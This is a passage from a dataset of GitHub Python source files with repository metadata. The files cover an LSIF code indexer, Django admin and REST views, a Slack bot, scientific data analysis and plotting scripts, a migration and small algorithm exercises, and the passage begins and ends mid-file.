= type_cell_interval.reset_index(drop=True)\r\n for l in range(len(type_cell_interval) - 1):\r\n if (type_cell_interval.loc[l, config['description']] == description[i]) & (type_cell_interval.loc[l + 1, config['description']] == description[j]):\r\n transition_number = transition_number + 1\r\n if description_number == 0:\r\n if i == j:\r\n Matrix[i][j] = 1\r\n else:\r\n Matrix[i][j] = 0\r\n else:\r\n Matrix[i][j] = transition_number / description_number\r\n transition_matrix = pd.DataFrame(Matrix,index=description,columns=description)\r\n\r\n path_result = os.path.join(config[\"data_directory\"], config[\"data_name\"])\r\n book = load_workbook(path_result)\r\n writer_result = pd.ExcelWriter(path_result, engine='openpyxl')\r\n writer_result.book = book\r\n\r\n transition_matrix.to_excel(writer_result, sheet_name=str(type_list[t]))\r\n writer_result.save()\r\n","repo_name":"AlineMefleh/Approach3-Configuration","sub_path":"Anomaly-Detection-Alarms/Paramaters-Estimation/Transition-Matrix.py","file_name":"Transition-Matrix.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28813406530","text":"import abc\nimport dataclasses\nimport json\nfrom functools import cached_property\nfrom pathlib import Path\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Generator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\n\nfrom jedi.api import Script\nfrom jedi.api.classes import Name\n\nfrom lsif.padawan import Definition\nfrom lsif.padawan import Reference\nfrom lsif.types import Range\nfrom lsif.types import Writer\n\n__version__ = \"0.1.0\"\n\n\n# THREAD\nIGNORE_ID = -1\n\n\ndef _get_next_id() -> Generator[int, None, None]:\n count = 1\n while True:\n yield count\n count += 1\n\n\nclass BaseNode(abc.ABC):\n __id_generator = _get_next_id()\n id: int\n\n _base_fields: Tuple[str, ...] = (\"label\", \"type\", \"id\")\n\n @property\n @abc.abstractmethod\n def type(self) -> str:\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def label(self) -> str:\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def _fields(self) -> Tuple[str, ...]:\n raise NotImplementedError\n\n def __init__(self, id: Optional[int] = None) -> None:\n self.id = id or next(self.__id_generator)\n\n def to_dictionary(self) -> Dict[str, Any]:\n fields = list(self._base_fields + self._fields)\n\n # Can pass IGNORE_ID to not serialize ID\n # Thus far, only metadata needs this.\n if self.id == IGNORE_ID:\n fields.remove(\"id\")\n\n return {field: getattr(self, field) for field in fields}\n\n def serialize(self) -> str:\n return json.dumps(self.to_dictionary()) + \"\\n\"\n\n\nclass EdgeBase(BaseNode):\n type = \"edge\"\n\n def __init__(self) -> None:\n super().__init__()\n\n\nclass NextNode(EdgeBase):\n label = \"next\"\n\n inV: int\n outV: int\n\n _fields = (\"inV\", \"outV\")\n\n def __init__(self, inV: int, outV: int) -> None:\n super().__init__()\n self.inV = inV\n self.outV = outV\n\n\nclass SingleEdgeBase(EdgeBase):\n inV: int\n outV: int\n\n _fields = (\"inV\", \"outV\")\n\n def __init__(self, inV: int, outV: int) -> None:\n super().__init__()\n self.inV = inV\n self.outV = outV\n\n\nclass TextDocumentHoverNode(SingleEdgeBase):\n label = \"textDocument/hover\"\n\n\nclass TextDocumentDefinitionNode(SingleEdgeBase):\n label = \"textDocument/definition\"\n\n\nclass TextDocumentReferenceNode(SingleEdgeBase):\n label = \"textDocument/references\"\n\n\nclass MultiEdgeBase(EdgeBase):\n inVs: List[int]\n outV: int\n\n _fields: Tuple[str, ...] = (\"inVs\", \"outV\")\n\n def __init__(self, inVs: List[int], outV: int) -> None:\n super().__init__()\n self.inVs = inVs\n self.outV = outV\n\n\nclass ItemNode(MultiEdgeBase):\n label = \"item\"\n document: int\n\n _fields = (\"document\", *MultiEdgeBase._fields)\n\n def __init__(self, document: \"DocumentNode\", *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n\n self.document = document.id\n\n\nclass ContainsNode(MultiEdgeBase):\n label = \"contains\"\n\n\nclass VertexBase(BaseNode):\n type = \"vertex\"\n\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n super().__init__(*args, **kwargs)\n\n\nclass MetadataNode(VertexBase):\n \"\"\"Node for metadata stuff\"\"\"\n\n label = \"metaData\"\n\n _fields = (\"version\", \"positionEncoding\", \"projectRoot\")\n\n \"\"\" The version of the LSIF format using semver notation. See https://semver.org/. Please note\n the version numbers starting with 0 don't adhere to semver and adopters have to assume\n the each new version is breaking.\n \"\"\"\n version: str = \"0.5.0\"\n\n \"\"\" Always utf-16 because lsp. \"\"\"\n positionEncoding: str = \"utf-16\"\n\n \"\"\" The project root (in form of an URI) used to compute this dump.\"\"\"\n projectRoot: str\n\n def __init__(self, projectRoot: Path) -> None:\n super().__init__(id=IGNORE_ID)\n self.projectRoot = projectRoot.absolute().as_uri()\n\n\nclass ProjectNode(VertexBase):\n label = \"project\"\n kind = \"python\"\n\n _fields = (\"label\", \"kind\")\n\n\nclass DocumentNode(VertexBase):\n \"\"\"{\n id : 1,\n type : \"vertex\",\n label : \"document\",\n uri : \"file:///Users/dirkb/sample.ts\",\n languageId : \"typescript\"\n }\n \"\"\"\n\n label = \"document\"\n languageId: str = \"python\"\n\n _fields = (\"label\", \"languageId\", \"uri\")\n\n uri: str\n path: Path\n\n def __init__(self, path: Path) -> None:\n super().__init__()\n self.path = path.absolute()\n self.uri = self.path.as_uri()\n\n @cached_property\n def script(self) -> Script:\n return Script(path=str(self.path))\n\n\nclass ResultSetNode(VertexBase):\n label = \"resultSet\"\n _fields = tuple()\n\n def __init__(self) -> None:\n super().__init__()\n\n\nclass RangeNode(VertexBase):\n label = \"range\"\n _fields = (\"start\", \"end\", \"document\")\n\n _range: Range\n _document: DocumentNode\n\n def __init__(self, range: Range, document: DocumentNode) -> None:\n super().__init__()\n self._range = range\n self._document = document\n\n @property\n def start(self) -> Dict:\n return dataclasses.asdict(self._range.start)\n\n @property\n def end(self) -> Dict:\n return dataclasses.asdict(self._range.end)\n\n @property\n def document(self) -> int:\n return self._document.id\n\n\nclass HoverResult(VertexBase):\n label = \"hoverResult\"\n result: Dict\n\n _fields = (\"result\",)\n\n def __init__(self, definition: Definition) -> None:\n super().__init__()\n self.result = {\"contents\": [definition.docstring]}\n\n\nclass DefinitionResult(VertexBase):\n label = \"definitionResult\"\n _fields = tuple()\n\n\nclass ReferenceResult(VertexBase):\n label = \"referenceResult\"\n _fields = tuple()\n\n\n_ = \"\"\"\n// The document\n{ id: 4, type: \"vertex\", label: \"document\", uri: \"file:///Users/dirkb/sample.ts\", languageId: \"typescript\" }\n\n// The bar declaration\n{ id: 6, type: \"vertex\", label: \"resultSet\" }\n{ id: 9, type: \"vertex\", label: \"range\", start: { line: 0, character: 9 }, end: { line: 0, character: 12 } }\n{ id: 10, type: \"edge\", label: \"next\", outV: 9, inV: 6 }\n\"\"\"\n\n\ndef index(project_path: Path, writer: Writer) -> None:\n mt = MetadataNode(project_path)\n writer.write(mt.serialize())\n\n project_node = ProjectNode()\n writer.write(project_node.serialize())\n\n names_to_result_sets: Dict[str, ResultSetNode] = {}\n module_path_to_document_node: Dict[str, DocumentNode] = {}\n\n document_ids: List[int] = []\n\n for file in project_path.glob(\"**/*.py\"):\n # TODO: Keep track of the ranges to associate them with this document\n print(\"Parsing:\", file)\n\n filepath = Path(file)\n abs_path = str(filepath.absolute())\n document_node = module_path_to_document_node.get(abs_path, None)\n if not document_node:\n document_node = DocumentNode(filepath)\n writer.write(document_node.serialize())\n\n document_ids.append(document_node.id)\n module_path_to_document_node[str(document_node.script.path.absolute())] = document_node\n\n contained_ranges: List[RangeNode] = []\n\n # I think this is always empty\n # names = document.script.get_names(all_scopes=True, definitions=False, references=False)\n # print(names)\n\n definitions = document_node.script.get_names(all_scopes=True, definitions=True, references=False)\n for jedi_def in definitions:\n result_set = ResultSetNode()\n\n def_name = jedi_def.full_name or jedi_def.name\n print(def_name)\n assert def_name, f\"Missing name for: {jedi_def}\"\n\n names_to_result_sets[def_name] = result_set\n\n definition = Definition(jedi_def)\n definition_node = RangeNode(range=definition.range, document=document_node)\n\n contained_ranges.append(definition_node)\n\n writer.write(result_set.serialize())\n writer.write(definition_node.serialize())\n\n definition_next_node = NextNode(inV=result_set.id, outV=definition_node.id)\n writer.write(definition_next_node.serialize())\n\n hover_node = HoverResult(definition=definition)\n writer.write(hover_node.serialize())\n\n writer.write(TextDocumentHoverNode(inV=hover_node.id, outV=result_set.id).serialize())\n\n definition_result_node = DefinitionResult()\n writer.write(definition_result_node.serialize())\n\n writer.write(TextDocumentDefinitionNode(inV=definition_result_node.id, outV=result_set.id).serialize())\n writer.write(\n ItemNode(inVs=[definition_node.id], outV=definition_result_node.id, document=document_node).serialize()\n )\n\n references = document_node.script.get_names(all_scopes=True, definitions=False, references=True)\n for jedi_ref in references:\n reference = Reference(jedi_ref)\n reference_node = RangeNode(range=reference.range, document=document_node)\n contained_ranges.append(reference_node)\n\n writer.write(reference_node.serialize())\n\n possible_definitions = jedi_ref.goto(follow_imports=True)\n if not possible_definitions:\n print(\"No definitions found:\", jedi_ref)\n continue\n\n jedi_reference_def = possible_definitions[0]\n if jedi_reference_def.full_name not in names_to_result_sets:\n print(\"SKIPPING:\", jedi_reference_def, jedi_reference_def.module_name)\n continue\n\n jedi_reference_def_name = jedi_reference_def.full_name\n assert jedi_reference_def_name\n jedi_reference_def_result_set = names_to_result_sets[jedi_reference_def_name]\n\n writer.write(NextNode(inV=jedi_reference_def_result_set.id, outV=reference_node.id).serialize())\n\n reference_result_node = ReferenceResult()\n writer.write(reference_result_node.serialize())\n\n writer.write(\n TextDocumentReferenceNode(\n inV=reference_result_node.id, outV=jedi_reference_def_result_set.id\n ).serialize()\n )\n\n writer.write(\n ItemNode(inVs=[reference_node.id], outV=reference_result_node.id, document=document_node).serialize()\n )\n\n # I make this edge earlier maybe? otherwise feels like you keep a ton of stuff in memory for lookups...\n # writer.write(\n # ItemNode(inVs=[jedi_reference_def.id], outV=reference_result_node.id, document=document_node).serialize()\n # )\n\n writer.write(ContainsNode(inVs=[x.id for x in contained_ranges], outV=document_node.id).serialize())\n\n print(\"module paths:\", module_path_to_document_node)\n print(\"definition names:\", names_to_result_sets)\n writer.write(ContainsNode(inVs=document_ids, outV=project_node.id).serialize())\n\n\ndef index_to_file(project_root: Path) -> None:\n with open(\"dump.lsif\", \"w\") as writer:\n index(project_root, writer)\n","repo_name":"tjdevries/lsif-python-tmp","sub_path":"src/lsif/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"70740907042","text":"from django.contrib import admin\nfrom .models import Vendor, OpeningHour\n\n# Register your models here.\n@admin.register(Vendor)\nclass VendorAdmin(admin.ModelAdmin):\n list_display = [\n 'user', 'vendor_name', 'vendor_license', 'is_approved'\n ]\n\n list_display_links = [\n 'user', 'vendor_name'\n ]\n\n list_editable = [\n 'is_approved'\n ]\n\n prepopulated_fields= {\n 'vendor_slug':('vendor_name',)\n }\n\n\n@admin.register(OpeningHour)\nclass OpeningHourAdmin(admin.ModelAdmin):\n list_display= [\n 'vendor', 'day', 'from_hour', 'to_hour'\n ]\n\n","repo_name":"kgawas9/djangoOnlineFood","sub_path":"vendor/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43463547341","text":"import main\nimport time\n\nn = 6\n\nm = 3\n\nk = 2\n\nanimales = [\n (\"ciempies\", 1),\n (\"libelula\", 2),\n (\"gato\", 3),\n (\"perro\", 4),\n (\"tapir\", 5),\n (\"nutria\", 6)\n]\n\napertura = [[\"tapir\", \"nutria\", \"perro\"], [\"tapir\", \"perro\", \"gato\"], [\"ciempies\", \"tapir\", \"gato\"],\n [\"gato\", \"ciempies\", \"libelula\"]]\n\npartes = [[[\"tapir\", \"nutria\", \"perro\"], [\"ciempies\", \"tapir\", \"gato\"]],\n [[\"gato\", \"ciempies\", \"libelula\"], [\"tapir\", \"perro\", \"gato\"]]\n ]\n\n\nprint(\"total escenas: \", ((m-1)*k)*2 )\n#Llamar mi función\ninicioTiempo=time.time()*1000\n#main.espectaculo(n, m, k, animales, apertura, partes,'insertion_sort')\nmain.espectaculo(n, m, k, animales, apertura, partes,'any_sort')\n#main.espectaculo(n, m, k, animales, apertura, partes,'another_sort')\nfinalTiempo=time.time()*1000\nprint('TIEMPO DEL ALGORITMO: ', (finalTiempo-inicioTiempo))","repo_name":"Deisy05/zoologicoCaliADAI","sub_path":"ejemplosI.py","file_name":"ejemplosI.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72795113761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 10 12:52:11 2015\n\nStereology Analysis:\nReads through a series of csvs containing exported StereoInvestigator cell\ncount data and produces a set of DataFrames containing information on ratios between available\ncell types (Arc/NeuN, Arc/DAPI, NeuN/DAPI)\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport os\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\n\ndef get_frame(filename, region):\n '''\n Creates a list of dataframes containing all counting data for desired region\n '''\n os.chdir(filename)\n framelist = []\n indexframe = pd.DataFrame(np.zeros((0,1)),columns = ['Number'])\n index = pd.DataFrame(np.zeros((1,1)),columns = ['Number'])\n \n for i in np.arange(1,24):\n filename = str(i) + region + '.csv'\n print(filename)\n if os.path.isfile(filename):\n frame = pd.read_csv(str(i)+region+'.csv', index_col='Marker', engine='python')\n framelist.append(frame)\n index.iloc[0] = i\n indexframe = indexframe.append(index)\n os.chdir(os.pardir)\n \n return framelist, indexframe\n \ndef create_ratioframe(framelist):\n '''\n loops through framelist, creating a dataframe with ratio data for each mouse\n '''\n ratioframe = pd.DataFrame(np.zeros((0,5)),columns = ['Arc/Neun','Arc/DAPI','NeuN/DAPI',\n 'Estimated Population using Mean Section Thickness','Coefficient of Error (Gundersen), m=1'])\n ratios = pd.DataFrame(np.zeros((1,5)),columns = ['Arc/Neun','Arc/DAPI','NeuN/DAPI',\n 'Estimated Population using Mean Section Thickness','Coefficient of Error (Gundersen), m=1'])\n \n \n for i in framelist:\n \n if 'colabel' in i.index.values.tolist():\n arcneun = (i['Total Markers Counted']['brdu'] / (i['Total Markers Counted']['colabel']))*100\n arcdapi = np.nan\n ce = np.nan\n neundapi = np.nan\n estpop = i['Estimated Population using Mean Section Thickness']['brdu']\n ce = i['Coefficient of Error (Gundersen), m=1']['brdu']\n if 'cfos' in i.index.values.tolist():\n arcdapi = (i['Total Markers Counted']['brdu'] / i['Total Markers Counted']['cfos'])*100\n neundapi = (i['Total Markers Counted']['colabel'] / i['Total Markers Counted']['cfos'])*100\n elif 'cfos' in i.index.values.tolist():\n arcdapi = (i['Total Markers Counted']['brdu'] / (i['Total Markers Counted']['cfos']))*100\n estpop = i['Estimated Population using Mean Section Thickness']['brdu']\n arcneun = np.nan\n neundapi = np.nan\n print(i.index.values.tolist())\n ce = 'placehold'\n \n ratios.iloc[0] = [arcneun,arcdapi,neundapi,estpop, ce]\n ratioframe = ratioframe.append(ratios)\n \n #Stores blinded index number of each mouse by removing the final 4chars (ie. '.DAT') from filename\n \n \n \n return ratioframe\n\ndef assign_groups(key, ratioframe, index):\n '''\n Assigns real mouse names and groups to ratioframe based on key\n '''\n Key = pd.read_csv(key,index_col='Number')\n ratioframe.index=index['Number']\n ratioframe['Name'] = Key['Name']\n ratioframe['Group'] = Key['Group']\n\n return ratioframe\n \ndef make_tables(ratioframe):\n '''\n Constructs DataFrame tables of ratio data based on group ID\n '''\n \n ArcNeunRatio = ratioframe.pivot('Name','Group', values='Arc/Neun').sort_index(axis=1,\n ascending=False)\n \n NeunDAPIRatio = ratioframe.pivot('Name','Group', values='NeuN/DAPI').sort_index(axis=1,\n ascending=False)\n \n EstPop = ratioframe.pivot('Name','Group', values='Estimated Population using Mean Section Thickness').sort_index(axis=1,\n ascending=False)\n \n ArcDapi = ratioframe.pivot('Name','Group', values='Arc/DAPI').sort_index(axis=1,\n ascending=False)\n \n return ArcNeunRatio, NeunDAPIRatio, EstPop, ArcDapi\n\nif __name__ == \"__main__\":\n framelist, index = get_frame('PV Total Proportion','BA')\n ratioframe = create_ratioframe(framelist)\n ratioframe = assign_groups('PV Stereology Key.csv', ratioframe, index)\n ArcNeunRatio, NeunDAPIRatio, EstPop, ArcDapi = make_tables(ratioframe)\n \n ax = sns.barplot(x='Group', y='Arc/DAPI', data=ratioframe)","repo_name":"jdpigeon/Cell-Count-Analysis","sub_path":"StereologyCount.py","file_name":"StereologyCount.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18245015231","text":"'''\r\nWe define f(X, Y) as number of different corresponding bits in binary representation of X and Y. For example, f(2, 7) = 2, since binary representation of 2 and 7 are 010 and 111, respectively. The first and the third bit differ, so f(2, 7) = 2.\r\n\r\nYou are given an array of N positive integers, A1, A2 ,…, AN. Find sum of f(Ai, Aj) for all pairs (i, j) such that 1 ≤ i, j ≤ N. Return the answer modulo 109+7.\r\n\r\nFor example,\r\n\r\nA=[1, 3, 5]\r\n\r\nWe return\r\n\r\nf(1, 1) + f(1, 3) + f(1, 5) + \r\nf(3, 1) + f(3, 3) + f(3, 5) +\r\nf(5, 1) + f(5, 3) + f(5, 5) =\r\n\r\n0 + 1 + 1 +\r\n1 + 0 + 2 +\r\n1 + 2 + 0 = 8\r\n'''\r\nclass Solution:\r\n # @param A : list of integers\r\n # @return an integer\r\n def cntBits(self, A):\r\n l=[]\r\n c=0\r\n for i in A:\r\n l.append(\"{:032b}\".format(i))\r\n \r\n l = list(zip(*l))\r\n \r\n for i in l:\r\n a=i.count('0')\r\n b=i.count('1')\r\n c+=(2*a*b)\r\n \r\n return c%1000000007","repo_name":"sharmaji27/InterviewBit-Problems","sub_path":"Bit Manipulation/Different Bits Sum Pairwise.py","file_name":"Different Bits Sum Pairwise.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34437825248","text":"from oarepo_ui.resources.config import RecordsUIResourceConfig\n\n\nclass OAIHarvesterUIResourceConfig(RecordsUIResourceConfig):\n template_folder = \"../templates\"\n url_prefix = \"/oaiharvester/\"\n blueprint_name = \"oai-harvester-ui\"\n ui_serializer_class = \"oarepo_oaipmh_harvester.oai_harvester.resources.records.ui.OaiHarvesterUIJSONSerializer\"\n api_service = \"oarepo-oaipmh-harvester\"\n layout = \"oarepo-oaipmh-harvester\"\n\n templates = {\n \"detail\": {\n \"layout\": \"oai_harvester_ui/HarvesterDetail.html.jinja\",\n \"blocks\": {\n \"record_main_content\": \"HarvesterMain\",\n \"record_sidebar\": \"HarvesterSidebar\",\n },\n },\n \"search\": {\n \"layout\": \"oai_harvester_ui/HarvesterSearch.jinja\",\n \"app_id\": \"OaiHarvester.Search\",\n },\n }\n\n routes = {\n \"search\": \"\",\n \"detail\": \"/\",\n \"export\": \"//export/\",\n }\n\n def search_active_facets(self, api_config, identity):\n return list(self.search_available_facets(api_config, identity).keys())\n","repo_name":"oarepo/oarepo-oai-pmh-harvester","sub_path":"oarepo_oaipmh_harvester/ui/oai_harvester/resources/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19578305656","text":"import numpy as np\nimport matplotlib.pylab as plt\n\ndata = np.genfromtxt(\"RungeKutta.dat\")\n\ntime = data[:,0]\npos = data[:,1]\nvelo = data[:,2]\n\nplt.figure(figsize=(10,8))\nplt.plot(time, pos,label=\"$Posición$\")\nplt.grid()\nplt.xlabel('$t(s)$')\nplt.ylabel('$x(m)$')\nplt.legend()\nplt.savefig(\"RungePos\")\n\nplt.figure(figsize=(10,8))\nplt.plot(time, velo,label=\"$Velocidad$\")\nplt.grid()\nplt.xlabel('$t(s)$')\nplt.ylabel('$v(m/s)$')\nplt.legend()\nplt.savefig(\"RungeVelo\")\n\nplt.figure(figsize=(10,8))\nplt.plot(time, velo,label=\"$Velocidad$\",c=\"r\")\nplt.plot(time, pos,label=\"$Posición$\",c=\"g\")\nplt.grid()\nplt.xlabel('$t(s)$')\nplt.legend()\nplt.savefig(\"Runge\")","repo_name":"metodos-computacionales-1/ejercicio-14-segunda-parte-DavidV4rg","sub_path":"parte2/Grafica1.py","file_name":"Grafica1.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14116483861","text":"\"\"\"Added User model\n\nRevision ID: 186be741cd49\nRevises: 37b8d137fd24\nCreate Date: 2023-03-08 12:19:10.248405\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '186be741cd49'\ndown_revision = '37b8d137fd24'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('full_name', sa.String(), nullable=True),\n sa.Column('city', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('users')\n # ### end Alembic commands ###\n","repo_name":"KarimAreeb273/Halal-Food-Finder","sub_path":"lib/migrations/versions/186be741cd49_added_user_model.py","file_name":"186be741cd49_added_user_model.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"20383616337","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\ndf = pd.read_csv('car driving risk analysis.csv')\r\n#print(df)\r\nx = df[['speed']]\r\ny = df['risk']\r\n\r\n#print(df.head(5))\r\n#print(df.shape)\r\n#print(df.isnull().any())\r\n#print(x)\r\n#print(y)\r\n\r\n#plt.scatter(df['speed'],df['risk'])\r\n#plt.show()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nxtrain, xtest, ytrain, ytest = train_test_split(x, y, test_size=0.60, random_state=1)\r\n#print(xtrain)\r\n#print(xtest)\r\nfrom sklearn.linear_model import LinearRegression\r\nreg = LinearRegression()\r\nreg.fit(xtrain,ytrain)\r\n#print(reg.predict(xtest))\r\n\r\nplt.scatter(df['speed'],df['risk'])\r\nplt.plot(df.speed, reg.predict(df[[\"speed\"]]))\r\nplt.show()\r\n\r\nprint(reg.predict([[300]]))\r\nprint(reg.coef_)\r\nprint(reg.intercept_)\r\n\r\n\r\n\r\n","repo_name":"Akash-Ahmed-CSE/Python","sub_path":"Basic coding/Linear Regression in Machine Learning.py","file_name":"Linear Regression in Machine Learning.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13607923287","text":"import os\nimport logging\nfrom flask import Flask\nfrom slack import WebClient\nfrom slackeventsapi import SlackEventAdapter\nfrom coinbot import CoinBot\nfrom get_network import NetBot\n\n# Initialize a Flask app to host the events adapter\napp = Flask(__name__)\n\n# Create an events adapter and register it to an endpoint in the slack app for event ingestion.\nslack_events_adapter = SlackEventAdapter(\n os.environ.get(\"SLACK_EVENTS_TOKEN\"), \"/slack/events\", app\n)\n\n# Initialize a Web API client\nslack_web_client = WebClient(token=os.environ.get(\"SLACK_TOKEN\"))\n\n# Define bot ID so it will not respond to itself\nBOT_ID = slack_web_client.api_call(\"auth.test\")[\"user_id\"]\n\n\ndef flip_coin(channel):\n \"\"\"\n Craft the CoinBot, flip the coin and send the message to the channel\n \"\"\"\n # Create a new CoinBot\n coin_bot = CoinBot(channel)\n\n # Get the onboarding message payload\n my_message = coin_bot.get_message_payload()\n\n # Post the onboarding message in Slack\n slack_web_client.chat_postMessage(**my_message)\n\n\ndef send_me_help(channel, device_name):\n \"\"\"\n run send_help method\n \"\"\"\n net_bot = NetBot(channel, device_name)\n file_output = net_bot.send_help()\n slack_web_client.files_upload(**file_output)\n\n\ndef get_network_info(channel, device_name):\n \"\"\"\n run the get_message_payload and get_file_upload method\n \"\"\"\n net_bot = NetBot(channel, device_name)\n my_message = net_bot.get_message_payload()\n file_output = net_bot.get_file_payload()\n slack_web_client.chat_postMessage(**my_message)\n slack_web_client.files_upload(**file_output)\n\n\n# When a 'message' event is detected by the events adapter, forward that payload\n# to this function.\n@slack_events_adapter.on(\"message\")\ndef message(payload):\n \"\"\"\n Parse the message event, and if the activation string is in the text,\n simulate something and send result\n \"\"\"\n\n # Get various portions of message\n event = payload.get(\"event\", {})\n text = event.get(\"text\")\n user_id = event.get(\"user\")\n timestamp = event.get(\"ts\")\n channel_id = event.get(\"channel\")\n\n # Making sure the bot doesnt respond to itself\n if BOT_ID != user_id:\n # Check and see if the activation phrase was in the text of the message.\n # If so, execute the code to flip a coin.\n if \"hey netbot flip coin\" in text.lower():\n # Execute the flip_coin function and send the results of\n # flipping a coin to the channel\n return flip_coin(channel_id)\n\n if \"netbot get network interfaces\" in text.lower():\n full_text = text.split()\n device = full_text[-1]\n my_device = device.replace(\"device=\", \"\")\n slack_web_client.reactions_add(\n channel=channel_id, name=\"robot_face\", timestamp=timestamp\n )\n slack_web_client.reactions_add(\n channel=channel_id, name=\"rocket\", timestamp=timestamp\n )\n return get_network_info(channel_id, device_name=my_device)\n\n if \"netbot help\" in text.lower():\n slack_web_client.reactions_add(\n channel=channel_id, name=\"sos\", timestamp=timestamp\n )\n slack_web_client.reactions_add(\n channel=channel_id, name=\"interrobang\", timestamp=timestamp\n )\n return send_me_help(channel_id, device_name=\"\")\n\n\nif __name__ == \"__main__\":\n # Create the logging object\n logger = logging.getLogger()\n\n # Set the log level to DEBUG. This will increase verbosity of logging messages\n logger.setLevel(logging.DEBUG)\n\n # Add the StreamHandler as a logging handler\n logger.addHandler(logging.StreamHandler())\n\n # Run your app on your externally facing IP address on port 3000 instead of\n # running it on localhost, which is traditional for development.\n app.run(host=\"0.0.0.0\", port=3000)\n","repo_name":"JulioPDX/ne_bot_example","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"13347256784","text":"from django.http import Http404\nfrom rest_framework import status\nfrom rest_framework.generics import RetrieveAPIView, UpdateAPIView, CreateAPIView\nfrom rest_framework.response import Response\n\nfrom api.permissions import IsCustomer\nfrom api.serializers.users import SettingsSerializer, SettingsCreateSettings, UserSerializer\nfrom settings import models\n\n\nclass User(RetrieveAPIView):\n permission_classes = (IsCustomer,)\n serializer_class = UserSerializer\n\n def get_object(self, *args, **kwargs):\n return self.request.user\n\n\nclass SettingsCreateAPIView(CreateAPIView):\n permission_classes = (IsCustomer,)\n serializer_class = SettingsCreateSettings\n\n def create(self, request, *args, **kwargs):\n user = request.user\n settings = models.Settings.objects.filter(user=user).first()\n if settings:\n serializer = self.get_serializer(settings, data=request.data)\n else:\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(user=user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\nclass SettingsRetrieveAPIView(RetrieveAPIView):\n permission_classes = (IsCustomer,)\n serializer_class = SettingsSerializer\n queryset = models.Settings.objects.all()\n\n def get_object(self):\n user = self.request.user\n settings = models.Settings.objects.filter(user=user).first()\n if not settings:\n raise Http404\n return settings\n\n def get(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass SettingsUpdateAPIView(UpdateAPIView):\n permission_classes = (IsCustomer,)\n serializer_class = SettingsSerializer\n\n def get_object(self):\n user = self.request.user\n obj_ = models.Settings.objects.filter(user=user)\n return obj_\n\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n","repo_name":"Kuzibaev/kpay_merchant_multitenant","sub_path":"api/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28626650585","text":"from itertools import cycle\n\nwith open('input/01.txt', 'r') as file:\n my_data = file.read().split()\n\n# Part 1\nnums = list(map(int, my_data))\nprint('Part 1:', sum(nums))\n\n# Part 2\nseen = set([0])\nssum = 0\ncnums = cycle(nums)\n\nwhile True:\n ssum += next(cnums)\n if ssum in seen:\n break\n seen.add(ssum)\n\nprint('Part 2:', ssum)\n","repo_name":"oski89/AoC","sub_path":"2018/day-01.py","file_name":"day-01.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13597136391","text":"\ndef gradient_descent(alpha, trainx, trainy, testx, testy, numiter, epsilon):\n theta = np.zeros(len(trainx[0]))\n m = len(trainy)\n arrcost = []\n for _ in range(1,numiter):\n pred = np.dot(trainx, theta)\n temp = np.dot((pred - trainy), trainx)\n theta = theta - ((alpha / m) * temp)\n val = np.sum((np.dot(trainx,theta) - trainy) / m)\n arrcost.append(np.abs(val))\n 